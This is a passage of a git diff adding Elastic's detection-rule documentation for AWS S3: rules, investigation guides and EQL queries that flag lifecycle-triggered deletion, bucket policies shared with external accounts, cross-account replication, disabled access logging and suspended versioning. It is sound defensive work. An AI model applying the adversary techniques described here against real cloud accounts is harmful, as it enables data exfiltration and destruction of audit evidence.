investigation steps* + + +**Identify the actor and execution context** + +- **Principal and Identity Type**: + Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `aws.cloudtrail.user_identity.access_key_id`. + Determine if the actor is an IAM user, role, or automation service account. + - Unusual: temporary credentials, federated roles, or previously inactive accounts. +- **Source Information**: + Review `source.ip`, `cloud.region`, and `user_agent.original` for unexpected geolocations, tool usage (CLI, SDK, automation service), or newly-observed hosts. +- **Timestamp correlation**: + Use `@timestamp` to check if this activity occurred during change windows or off-hours. + +**Examine the lifecycle configuration details** +- Extract details from `aws.cloudtrail.request_parameters`: + - `Expiration`: Number of days until deletion (e.g., `Days=1` indicates rapid expiry). + - `Prefix`: If limited to certain object paths (e.g., `/logs/`, `/tmp/`). + - `Status`: `Enabled` vs. `Disabled`. + - `ID` or rule name: May reveal purpose (“cleanup-test”, “delete-logs”). +- Determine the affected bucket from `aws.cloudtrail.resources.arn` or `aws.cloudtrail.resources.type`. + Cross-check the bucket’s purpose (e.g., log storage, data lake, analytics export, threat forensics). + - High-risk if the bucket contains audit, CloudTrail, or application logs. + +**Correlate with related AWS activity** +Use AWS CloudTrail search or your SIEM to pivot for: +- **Prior suspicious activity**: + - `DeleteObject`, `PutBucketPolicy`, `PutBucketAcl`, or `PutBucketLogging` changes to disable visibility. + - IAM changes such as `AttachUserPolicy` or `CreateAccessKey` that may have enabled this modification. +- **Subsequent changes**: + - `PutBucketLifecycle` events in other buckets (repeated pattern). + - Rapid `DeleteObject` events or object expiration confirmations. +- **Cross-account activity**: + - Lifecycle rules followed by replication or cross-account copy events may indicate lateral exfiltration setup. + +**Assess intent and risk** +- Verify if the actor has a valid business case for altering object retention. +- If the bucket is used for security, compliance, or audit data, treat this as potential defense evasion. +- Evaluate whether the lifecycle rule removes data faster than your retention policy permits. + + +*False positive analysis* + + +- **Cost optimization**: Storage teams may automate lifecycle policies to reduce cost on infrequently accessed data. +- **Compliance enforcement**: Organizations implementing legal retention policies may set expiration for specific datasets. +- **Automation and IaC pipelines**: Terraform or CloudFormation templates often apply `PutBucketLifecycle` during resource deployment. + + +*Response and remediation* + + +**Containment and validation** +**Revert or disable** the lifecycle configuration if it is unauthorized: + - Use the AWS Console or CLI (`delete-bucket-lifecycle` or `put-bucket-lifecycle-configuration --lifecycle-configuration Disabled`). +**Preserve evidence**: + - Copy existing objects (especially logs or forensic data) before they expire. + - Enable object versioning or replication to protect against loss. + +**Investigation** +Review CloudTrail and S3 Access Logs for the same bucket: + - Identify who and what performed previous deletions. + - Determine whether any objects of investigative value have already been removed. +Search for other S3 buckets where similar lifecycle configurations were added in a short timeframe. + +**Recovery and hardening** +Implement guardrails: + - Use AWS Config rules like `s3-bucket-lifecycle-configuration-check` to monitor lifecycle changes. + - Restrict `s3:PutLifecycleConfiguration` to specific administrative roles. + - Enable https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lock.html[S3 Object Lock] on log or evidence buckets to enforce immutability. +Enable Security Hub and GuardDuty findings for additional anomaly detection on S3 data management activity. + + +*Additional information* + + +- **AWS Documentation** + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/lifecycle-expire-general-considerations.html[S3 Lifecycle Configuration] + - https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketLifecycle.html[DeleteBucketLifecycle API Reference] +- **AWS Playbooks** + - https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-PersonalDataBreach.md[Data Exposure and Exfiltration Response] + - https://github.com/aws-samples/aws-customer-playbook-framework/tree/main[AWS Customer Playbook Framework] + + +==== Rule query + + +[source, js] +---------------------------------- +info where data_stream.dataset == "aws.cloudtrail" + and event.action == "PutBucketLifecycle" + and event.outcome == "success" + and stringContains(aws.cloudtrail.request_parameters, "Expiration=") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Sub-technique: +** Name: Lifecycle-Triggered Deletion +** ID: T1485.001 +** Reference URL: https://attack.mitre.org/techniques/T1485/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc new file mode 100644 index 0000000000..f4ef8457c4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc @@ -0,0 +1,193 @@ +[[prebuilt-rule-8-19-32-aws-s3-bucket-policy-added-to-share-with-external-account]] +=== AWS S3 Bucket Policy Added to Share with External Account + +Detects when an Amazon S3 bucket policy is modified to share access with an external AWS account. This rule analyzes PutBucketPolicy events and compares the S3 bucket’s account ID to any account IDs referenced in the policy’s Effect=Allow statements. If the policy includes principals from accounts other than the bucket owner’s, the rule triggers an alert. This behavior may indicate an adversary backdooring a bucket for data exfiltration or cross-account persistence. For example, an attacker who compromises credentials could attach a policy allowing access from an external AWS account they control, enabling continued access even after credentials are rotated. Note: This rule will not alert if the account ID is part of the bucket’s name or appears in the resource ARN. Such cases are common in standardized naming conventions (e.g., “mybucket-123456789012”). To ensure full coverage, use complementary rules to monitor for suspicious PutBucketPolicy API requests targeting buckets with account IDs embedded in their names or resources. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://stratus-red-team.cloud/attack-techniques/AWS/aws.exfiltration.s3-backdoor-bucket-policy/ +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketPolicy.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 +* Tactic: Collection +* Tactic: Exfiltration +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 11 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS S3 Bucket Policy Added to Share with External Account* + + +This rule detects when an S3 bucket policy is modified using the `PutBucketPolicy` API call to include an external AWS account ID. +It compares the bucket’s `recipient_account_id` to any account IDs included in the policy’s `Effect=Allow` statement, triggering +an alert if the two do not match. + +Adversaries may exploit this to backdoor a bucket and exfiltrate sensitive data by granting permissions to another AWS account +they control, enabling ongoing access to the bucket’s contents even if IAM credentials are rotated or revoked. + +This detection specifically focuses on policy-based sharing and does not alert when: +- The account ID appears within the bucket or object name being shared. +- The account owner explicitly matches the policy’s condition keys on something other than an ARN or account id (i.e. IP address). + +To fully monitor for suspicious sharing behavior, use this rule in combination with detections for: +- Unusual PutBucketPolicy requests +- Cross-account object access (e.g., `GetObject`, `PutObject`) +- Changes to bucket ACLs or access points + + +*Possible investigation steps* + + +- **Identify the Actor and Context** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to identify who made the change. + - Determine if the identity typically manages S3 bucket policies. + - Examine `aws.cloudtrail.resources.arn` to determine which bucket is being shared. + +- **Analyze the Policy Change** + - Review `aws.cloudtrail.request_parameters` to extract the policy JSON and identify the external AWS account ID(s) referenced. + - Check for `Effect=Allow` statements granting broad permissions such as `"Action": "s3:*"` or `"Resource": "*"`. + - Verify if the added principals correspond to known partners or external vendors. + - If AWS account ID(s) were only part of `Effect=Deny` statements, then this rule can be closed as a false positive. + +- **Review Context and Source** + - Check `source.ip`, `source.geo`, and `user_agent.original` for anomalies — such as new IP ranges, access from unfamiliar geographies, or use of programmatic clients (`boto3`, `aws-cli`). + +- **Correlate with Related Activity** + - Search CloudTrail for subsequent activity by the external AWS account ID(s): + - `GetObject`, `ListBucket`, or `PutObject` events that indicate data access or exfiltration. + - Look for additional configuration changes by the same actor, such as: + - `PutBucketAcl`, `PutBucketVersioning`, or `PutBucketReplication` — often part of a larger bucket compromise chain. + - Determine if multiple buckets were modified in quick succession. + +- **Validate Intent** + - Review internal change requests or documentation to confirm whether this external sharing was approved. + - If no approval exists, escalate immediately for potential compromise. + + +*False positive analysis* + + +- **Authorized Cross-Account Access** + - Some organizations legitimately share S3 buckets across accounts within a trusted AWS Organization or partner accounts. + - Validate whether the external account ID belongs to a known entity or service provider and is documented in your allowlist. +- **Automation or Deployment Pipelines** + - Continuous integration/deployment pipelines may temporarily attach cross-account policies for replication or staging. + - Verify the `user_agent.original` or role name — automation often includes identifiable strings. +- **Naming and Rule Logic Limitations** + - This rule excludes detections where the account ID appears in the bucket resource ARN (e.g., `mybucket-123456789012`). + - Such patterns are common in automated provisioning. For those scenarios, rely on complementary rules that directly monitor `PutBucketPolicy` events against those buckets. + + +*Response and remediation* + + +- **Immediate Review and Containment** + - If unauthorized sharing is confirmed, use the AWS CLI or Console to delete or revert the modified policy (`aws s3api delete-bucket-policy` or restore from version control). + - Remove external principals and reapply the correct bucket policy. + - Rotate access keys for the actor involved, especially if API access came from unexpected locations or tools. + +- **Investigation and Scoping** + - Identify whether data was accessed by the external account via `GetObject` or `ListBucket` operations. + - Search CloudTrail logs for other buckets modified by the same actor or IP within the same timeframe. + - Use AWS Config to review version history of affected bucket policies and detect similar cross-account permissions. + +- **Recovery and Hardening** + - Restrict `s3:PutBucketPolicy` to a limited set of administrative roles using least privilege. + - Enable AWS Config rule `s3-bucket-policy-grantee-check` to monitor for unauthorized policy additions. + - Use AWS GuardDuty or Security Hub findings to correlate policy changes with data exfiltration or credential compromise events. + - Apply service control policies (SCPs) to block cross-account sharing unless explicitly approved. + + +*Additional information* + + - **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** + - **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** + - **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +info where data_stream.dataset == "aws.cloudtrail" + and event.provider == "s3.amazonaws.com" + and event.action == "PutBucketPolicy" + and event.outcome == "success" + and stringContains(aws.cloudtrail.request_parameters, "Effect=Allow") + and ( + stringContains(aws.cloudtrail.request_parameters, "AWS=") or + stringContains(aws.cloudtrail.request_parameters, "aws:PrincipalAccount=") or + stringContains(aws.cloudtrail.request_parameters, "aws:SourceAccount=") + ) +and not stringContains(aws.cloudtrail.request_parameters, "arn:aws:cloudfront::") +and not stringContains(aws.cloudtrail.request_parameters, "arn:aws:iam::cloudfront:user") +and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipient_account_id) + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-replicated-to-another-account.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-replicated-to-another-account.asciidoc new file mode 100644 index 0000000000..16355afd91 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-replicated-to-another-account.asciidoc @@ -0,0 +1,185 @@ +[[prebuilt-rule-8-19-32-aws-s3-bucket-replicated-to-another-account]] +=== AWS S3 Bucket Replicated to Another Account + +Identifies the creation or modification of an S3 bucket replication configuration that sends data to a bucket in a different AWS account. Cross-account replication can be used legitimately for backup, disaster recovery, and multi-account architectures, but adversaries with write access to an S3 bucket may abuse replication rules to silently exfiltrate large volumes of data to attacker-controlled accounts. This rule detects "PutBucketReplication" events where the configured destination account differs from the source bucket's account, indicating potential unauthorized cross-account data movement. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/replication-walkthrough-2.html/ +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketReplication.html/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 +* Tactic: Exfiltration +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS S3 Bucket Replicated to Another Account* + + +Cross-account S3 replication enables automated copying of S3 objects into a different AWS bucket. While useful for backup and organizational data flows, adversaries may exploit it as a covert exfiltration channel. Once replication is configured, any future writes to the bucket are silently copied to the destination bucket—even if object-level access controls block the attacker’s direct downloads. For this reason, unauthorized replication configuration should be considered high-risk. + +This rule detects successful `PutBucketReplication` events and flags cases where the replication configuration specifies a destination AWS account different from the source. + + +*Possible investigation steps* + + +**Understand who initiated the replication change** +- Inspect `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to identify the actor. +- Review authentication patterns such as federated session names, role chaining via STS, or unfamiliar IAM roles. +- Examine `source.ip`, `source.geo` fields, and `user_agent.original` for unusual locations, automation tools, or anomalous access paths. + +**Examine the replication rule details** +- Inspect `aws.cloudtrail.request_parameters` for: + - The **destination account ID** (`Account=`). + - The **IAM role ARN** used for replication. (`Role=`) + - Any filtering rules (prefixes, tags) that narrow or broaden what will be replicated. + +**Determine whether the destination account is authorized** +- Validate whether the destination AWS account belongs to your AWS Organization. +- Check internal documentation, IaC templates, or tagging standards to confirm whether replication to this account is expected. +- Look for prior legitimate infrastructure workflows such as: + - Centralized logging + - Backup/DR accounts + - Cross-region compliance replicas + +Unrecognized accounts should be treated as a strong exfiltration signal. + +**Assess the scope of potential data exposure** +- Determine whether the bucket contains sensitive or regulated data (PII, financial records, secrets, logs, etc.). +- Identify whether object versioning, lifecycle rules, or access logging were modified recently. +- Check for preceding or subsequent actions such as: + - `PutBucketPolicy` updates granting new principals access + - Creation or modification of IAM roles tied to replication + - `DeleteObject` or `PutObjectRetention` attempts that might pair with exfiltration + +**Correlate with other suspicious activity** +Pivot in CloudTrail on the same principal or same bucket: +- Prior reconnaissance such as `ListBuckets`, `GetBucketReplication`, or `GetBucketPolicy` +- Modification of KMS policies or unexpected encryption key usage +- New access patterns from external IP addresses or unusual automation + + +*False positive analysis* + + +**Legitimate cross-account replication** +Validate: +- The destination account belongs to a known OU or business unit +- The replication role ARN matches expected automation +- The change aligns with documented deployment or maintenance schedules + +**Temporary migrations or transitions** +During account restructuring or workload migration, administrators may temporarily redirect replication to new accounts. + +Tuning options: +- Exception lists based on IAM role ARNs +- Tag-based environment scoping +- Change-window-based suppression + + +*Response and remediation* + + +**Contain potential exfiltration** +- Remove or update replication rules to eliminate unauthorized destinations. +- Disable or restrict the replication IAM role until the investigation is complete. +- Review S3 object access logs to determine whether data has begun replicating to the external account. + +**Investigate scope and impact** +- Identify the volume and types of data at risk of replication. +- Determine whether the external bucket shows successful replication traffic (if logs or access are available). +- Assess whether the actor also modified bucket policies, encryption settings, or KMS keys. + +**Credential and role hygiene** +- Rotate credentials for the initiating user or role if compromise is suspected. +- Review IAM role trust policies, especially if STS sessions or EC2 role assumptions were involved. +- Enable MFA and tighten conditions for administrative roles capable of modifying replication. + +**Hardening and preventive controls** +- Enforce SCPs that restrict cross-account replication except for explicitly approved destinations. +- Require approval workflows before modifying replication or retention settings. +- Use AWS Config and Security Hub controls to detect: + - Buckets with unexpected replication rules + - Newly added cross-account permissions + - Changes to bucket policies, block-public-access settings, or KMS key policies + + +*Additional information* + + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +info where data_stream.dataset == "aws.cloudtrail" + and event.action == "PutBucketReplication" + and event.outcome == "success" + and stringContains(aws.cloudtrail.request_parameters, "Account=") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ +* Sub-technique: +** Name: Exfiltration to Cloud Storage +** ID: T1567.002 +** Reference URL: https://attack.mitre.org/techniques/T1567/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-server-access-logging-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-server-access-logging-disabled.asciidoc new file mode 100644 index 0000000000..c435095ad4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-server-access-logging-disabled.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-32-aws-s3-bucket-server-access-logging-disabled]] +=== AWS S3 Bucket Server Access Logging Disabled + +Identifies when server access logging is disabled for an Amazon S3 bucket. Server access logs provide a detailed record of requests made to an S3 bucket. When server access logging is disabled for a bucket, it could indicate an adversary's attempt to impair defenses by disabling logs that contain evidence of malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-server-access-logging.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 +* Tactic: Defense Evasion +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS S3 Bucket Server Access Logging Disabled* + + +This detection alerts when the server-access logging configuration for an S3 bucket is changed so that logging is disabled. +Because detailed request logs are central to tracking object access, modifications here are significant from a visibility and forensics standpoint. They can signal that an adversary is preparing to act (exfiltrate, delete, or manipulate data) while minimizing audit evidence. + + +*Possible investigation steps* + + +**Identify the actor and context** + - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `aws.cloudtrail.user_identity.access_key_id` to determine the who/what of the change. + - Inspect `user_agent.original`, `source.ip`, `@timestamp`, `cloud.account.id`, `cloud.region` for unusual or non-standard access patterns (e.g., new user, external IP, off-hours). + - Check the bucket resource (via `aws.cloudtrail.resources.arn`, `aws.cloudtrail.resources.type`) to determine the bucket’s business role (e.g., logs, backups, sensitive data store). + - Consider whether the bucket houses audit logs or access logs; if so, disabling logging is especially suspicious and a higher risk. + +**Correlate with related activities** + - Search for preceding or subsequent events by the same principal or for the same bucket: + - `DeleteObject`, `PutBucketAcl`, `PutBucketPolicy`, `RemoveBucketAccessPoint`, or other permissions changes (e.g., `PutBucketLifecycle`). + - `ListBucket`, `GetObject`, `CopyObject`, or large `GetObject` operations, especially from unusual IPs or cross-account. + - IAM changes in proximity: `AttachUserPolicy`, `CreateAccessKey`, `AssumeRole` by same principal or against the same principal. + - Review AWS Config or Audit logs to see if the bucket’s logging was previously enabled and how long it has been disabled. + +**Evaluate intent and risk** + - If the bucket was being used to collect access logs or audit data, disabling logging significantly degrades forensic capability. + - Determine whether the actor has a legitimate business reason for modifying logging (ticket, change request, known automation). + - If not justified, treat this as a high-priority visibility compromise and proceed through escalation. + + +*False positive analysis* + + +- Storage teams may disable logging temporarily during migration or cost-optimisation exercises. +- Test or development buckets may routinely toggle logging for experimentation—document such buckets and roles. +- Trusted automation (tagged, known user-agent, internal IPs) may adjust logging. Consider allow-listing such automation while preserving watch-points for changes to high-sensitivity buckets. + + +*Response and remediation* + + +**Contain & restore visibility** + - Immediately re-enable server‐access logging for the affected bucket (ensure `LoggingEnabled=true` and correct `TargetBucket/Prefix`). + - If you suspect activity while logging was disabled, preserve any remaining object versions, cross-account access logs, or S3 Inventory data. + +**Investigate scope and impact** + - Use CloudTrail Lake or Athena to query access to the bucket and objects for the timeframe when logging was disabled. + - Identify external IP addresses, unusual principals, or rapid object transfers or deletions. + +**Recover & harden** + - Apply bucket-policy or SCP restrictions to prevent unauthorized modifications of `PutBucketLogging` for audit/logging buckets. + - Enable AWS Config rule (e.g., `cloudtrail-s3-bucket-access-logging`) to alert if logging is disabled. + - Ensure logging target buckets are configured with retention, versioning, and immutability (S3 Object Lock) to prevent tampering. + +**Improve & monitor** + - Update your incident response playbook to include this scenario (see AWS IR + Customer Playbook Framework). + - Educate stakeholders (storage, DevOps, security) that any change to logging configuration on buckets — especially audit/log buckets should be treated as a security event and ticketed. + + +*Additional information* + + +- AWS documentation on https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html[S3 Server Access Logging] +- https://github.com/aws-samples/aws-incident-response-playbooks/tree/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks[AWS Incident Response Playbooks] +- https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework] + + +==== Rule query + + +[source, js] +---------------------------------- +info where data_stream.dataset == "aws.cloudtrail" + and event.provider == "s3.amazonaws.com" + and event.action == "PutBucketLogging" + and event.outcome == "success" + and not stringContains(aws.cloudtrail.request_parameters, "LoggingEnabled") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-object-versioning-suspended.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-object-versioning-suspended.asciidoc new file mode 100644 index 0000000000..bad1e0e109 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-object-versioning-suspended.asciidoc @@ -0,0 +1,156 @@ +[[prebuilt-rule-8-19-32-aws-s3-object-versioning-suspended]] +=== AWS S3 Object Versioning Suspended + +Identifies when object versioning is suspended for an Amazon S3 bucket. Object versioning allows for multiple versions of an object to exist in the same bucket. This allows for easy recovery of deleted or overwritten objects. When object versioning is suspended for a bucket, it could indicate an adversary's attempt to inhibit system recovery following malicious activity. Additionally, when versioning is suspended, buckets can then be deleted. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AmazonS3/latest/userguide/Versioning.html/ +* https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketVersioning.html/ +* https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation/ +* https://www.invictus-ir.com/news/ransomware-in-the-cloud/ +* https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 +* Tactic: Impact +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS S3 Object Versioning Suspended* + + +This rule detects when object versioning for an S3 bucket is suspended. S3 object versioning protects against data loss by maintaining prior versions of objects, allowing recovery if they are deleted or overwritten. +Adversaries with access to a misconfigured or compromised S3 bucket may disable versioning to inhibit recovery efforts, conceal data destruction, or prepare for ransomware-like activity. +This rule uses https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-eql-rule[EQL] to detect use of the `PutBucketVersioning` API operation where the request parameters include `Status=Suspended`. + + +*Possible investigation steps* + + +- **Identify the Actor** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine who performed the action. + - Verify whether this user or role has a legitimate operational reason to modify bucket versioning and whether such actions are common for this identity. + +- **Analyze the Source and Context** + - Review `source.ip` and `user_agent.original` to assess the origin of the request. + - Check for unusual geographic locations, IP ranges, or clients that do not typically manage storage configurations. + +- **Evaluate the Affected Resource** + - Review `aws.cloudtrail.resources.arn` or `aws.cloudtrail.request_parameters` to identify which bucket’s versioning was modified. + - Determine whether this bucket contains critical or regulated data (logs, backups, audit evidence, etc.) that would be impacted by versioning suspension. + +- **Correlate with Related Activity** + - Search for additional CloudTrail events performed by the same actor or IP address within the same timeframe, such as: + - `DeleteObject`, `DeleteObjects`, or `PutBucketLifecycle` events (potential data destruction). + - `PutBucketPolicy` or `PutBucketAcl` changes (permission manipulation). + - Review other detections related to S3 buckets or IAM changes to determine if this event is part of a larger sequence of destructive or unauthorized actions. + +- **Validate Intent** + - Confirm whether this configuration change aligns with approved maintenance or automation activity (e.g., cost optimization, test environment reset). + - If no corresponding change request or justification exists, treat this as a potential defense evasion or impact event. + + +*False positive analysis* + + +- **Legitimate Administrative Actions** + - Administrators or infrastructure automation tools may suspend versioning during migrations or lifecycle testing. Confirm through change management documentation. +- **Automation and Pipelines** + - Verify whether Infrastructure-as-Code tools (e.g., Terraform, CloudFormation) or backup lifecycle scripts routinely modify versioning states. + - Exclude predictable automation identities where justified, while ensuring strong audit controls remain in place. + + +*Response and remediation* + + +**Containment and Validation** +- Re-enable versioning immediately for the affected bucket using the AWS Console or CLI (`aws s3api put-bucket-versioning --bucket my-bucket --versioning-configuration Status=Enabled`). +- Verify the change with `get-bucket-versioning` to confirm the bucket is restored to “Enabled.” +- Identify IAM users or roles with `s3:PutBucketVersioning` permissions and restrict access to trusted administrators only. +- Preserve relevant CloudTrail, Config, and CloudWatch logs for the timeframe of the change to ensure integrity of investigation evidence. + +**Investigation and Scoping** +- Search CloudTrail for related actions by the same user or IP, including `DeleteObject`, `PutBucketLifecycle`, or `PutBucketPolicy`, to determine whether versioning suspension preceded object deletion or policy manipulation. +- Review S3 access logs or Data Events for deleted, overwritten, or newly uploaded files after versioning suspension. +- Validate if the change corresponds to an authorized change request or approved pipeline deployment. + +**Recovery and Hardening** +- If object loss or overwrites occurred, attempt recovery using cross-region replication, AWS Backup, or previous snapshot copies. +- Enable S3 Object Lock and MFA Delete on critical buckets to prevent future tampering. +- Configure the AWS Config rule `s3-bucket-versioning-enabled` to continuously monitor for versioning suspension and trigger automated alerts. +- Review IAM and service control policies to ensure the principle of least privilege is enforced for all S3 management actions. +- Document findings and update incident response procedures to include versioning protection as part of ransomware and data destruction prevention strategies. + + + +*Additional information* + +- AWS Documentation: https://docs.aws.amazon.com/AmazonS3/latest/userguide/Versioning.html[Using Versioning in S3] +- API Reference: 